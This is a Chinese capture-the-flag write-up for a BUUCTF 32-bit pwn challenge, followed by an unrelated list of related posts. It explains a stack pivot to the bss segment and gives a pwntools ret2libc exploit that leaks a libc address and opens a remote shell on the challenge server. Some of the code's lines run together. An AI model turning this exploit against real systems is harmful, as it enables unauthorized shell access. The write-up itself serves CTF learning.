[BUUCTF-pwn]——[Black Watch 入群题]PWN

  • 题目地址: https://buuoj.cn/challenges#[Black Watch 入群题]PWN

leave = mov ebp esp; pop ebp;
ret = pop eip;
函数本身会自己调用用一次, 我们再手动调用一次就可以进行栈劫持。
可以自己将栈写在纸上或者调试看看

思路

由于可以利用的溢出空间不够, 利用给定的bss段, 利用栈劫持到bss段。进行操作。

下面的 -4操作是因为会有一个pop ebp的指令执行, 执行过后。会 +4

exploit

from pwn import *
from LibcSearcher import *elf = ELF("./spwn")
p = remote("node3.buuoj.cn",26467)
main_addr = 0x08048513
s_addr = 0x0804A300
leave_ret = 0x08048408write_got = elf.got['write']
write_plt = elf.plt['write']payload1 = p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)
p.sendafter("What is your name?",payload1)payload2 = 'a' * 0x18 + p32(s_addr - 4) + p32(leave_ret)
p.sendafter("What do you want to say?", payload2)write_addr = u32(p.recv(4))print hex(write_addr)libc = LibcSearcher("write", write_addr)
libc_base = write_addr - libc.dump("write")
sys_addr = libc_base + libc.dump("system")
binsh = libc_base + libc.dump("str_bin_sh")payload3 = p32(sys_addr) + 'junk' + p32(binsh)
p.sendlineafter("What is your name?",payload3)payload4 = 'a' * 0x18 + p32(s_addr - 4) + p32(leave_ret)
p.sendlineafter("What do you want to say?", payload4)p.interactive()

[BUUCTF-pwn]——[Black Watch 入群题]PWN相关推荐

  1. [Black Watch 入群题]PWN 栈劫持的利用

    32位程序,开启了nx保护 没有system函数和'/bin/sh'的字符串,这边需要我们自己去想办法构造system('/bin/sh') 思路 第一次输入的参数s,那边我们可以写入很长的数据,我们 ...

  2. 【DBA充电宝】和【Python充电宝】DBA充电宝和Python充电宝微信群已建立,可加我微信(lhrbestxh)入群...

    好消息,[DBA充电宝●微信群]和[Python学习微信群]都已建立,人数过多,不能扫码加入.想加入的新朋友可以加我微信(lhrbestxh,添加好友时请输入"加入DBA充电宝"或 ...

  3. 【通知】有三AI书籍和文化产品读者欢迎入群,送4本书!

    端午假期我们就不给大家推送新的技术文章了,今日邀请大家进入一个早就应该存在的群,"有三AI书籍和文化产品群".时至今日,有三AI生态平台已经出了两本书和多套文化产品,本次邀请相关用 ...

  4. 平均 3000-20000 块不等,有空接外包私活的入群!

    知乎上这个被浏览了948,816次的问题,看得我真是抓心挠肝: 都2021年了,居然还有兄弟不知道接外包赚外快的活路吗?! 根据自己的时间安排自由接活.开发方式可以选远程还是驻地,最后,只要你的项目够 ...

  5. 限时福利:入群锁定大会直播+PPT,听百位 AI 技术大咖、20 大热门主题分享!...

    文 / Aholiab 2020 年 7 月 3-4 日,由 CSDN 发起的「百万人学AI」倡议下,AI 开发者万人大会(AI ProCon 2020)将在线上正式与大家见面!届时,来自行业内 70 ...

  6. 付费入群怎么做_微信群怎么设置付费才可以进入

    如果我们有资源,有特立独行的表情包,或者有渠道,我们就可以通过付费进群的功能设置需要资源的用户可以扫码付费之后加入可以获取有趣的有价值的资源包或者表情包,需要实现付费进群功能也非常的简单,我们只需要准 ...

  7. 警惕,贡献商业源码入群!专门针对程序员的一种网络诈骗!

    昨天发的文章因为晓衡的疏忽,有几个地方遗漏打码了,在些说声抱歉,在此感谢大家的即时提醒. 成语小状元倒卖的当事人已经找到晓衡和解,因为我将昨天发的文章删除并修改,今天在次条上重新再发! 仔细回顾整个过 ...

  8. 微信付费进群收费进群系统源码 底部会显示价格(可自定义)入群

    正文: 源码的功能其实就是一个单独的页面 在上面你可以在后台自定义你的内容 底部会显示9.9(可自定义)入群.当然也可以加价,也可以换别的,不只是进群 还可以修改付费获得某项资源,搭建自己集思广益啦, ...

  9. 微信JavaEye老炮群的入群标准-2009年之前注册JavaEye的技术人员

    微信JavaEye老炮群的入群标准: 技术出身,2009年之前注册JavaEye的 入群之后把群昵称修改为JavaEye注册ID 对本群没有兴趣,请随时退群,不要害羞 符合条件的请私我,不符合的但是有 ...

最新文章

  1. 日本未来投资重点领域是物联网和人工智能应用
  2. 什么是正确的JSON内容类型?
  3. 微服务2.0技术栈选型手册,值得架构师借鉴
  4. ES6 Generator async
  5. jQuery——clone()方法
  6. excel mysql实时交换数据_Excel与数据库的数据交互
  7. 三段诡异的JavaScript代码,结果出乎意料
  8. js双击事件条件触发_js页面触发chargeRequest事件和Nginx获取日志信息
  9. 净推荐值NPS(Net Promoter Score)
  10. ubuntu 18改MAC桌面
  11. python绘制五角星
  12. Cesium图元管理和事件处理
  13. 软件著作权申请流程详细介绍(从注册到受理)
  14. VS2010读取大恒相机图像并显示
  15. 火麻油的功效与作用 火麻油怎么吃
  16. vs2012编程中输出中文出现乱码
  17. reboot:No mush tool
  18. 打开sln文件时提示“选择的文件时解决方案文件,但是用此应用程序的较新版本创建的,无法打开”
  19. 爆红的变老神器 FaceApp
  20. A Survey of Quantization Methods for Efficient Neural Network Inference---2021年

热门文章

  1. asp.net2.0导出pdf文件完美解决方案(转载)
  2. Python常用的几种去重方式
  3. 基于VSM的命名实体识别、歧义消解和指代消解
  4. 【数据结构与算法】之深入解析“压缩字符串”的求解思路与算法示例
  5. 834. Sum of Distances in Tree
  6. 中国大学MOOC 计算机组成原理第5章 测试(上)
  7. 数据结构和算法 —— 时间复杂度+空间复杂度
  8. 2018年第九届省赛C/C++A组第2题——星期一
  9. 【Linux网络编程】循环服务器之UDP循环模型
  10. 【Linux】一步一步学Linux——history命令(213)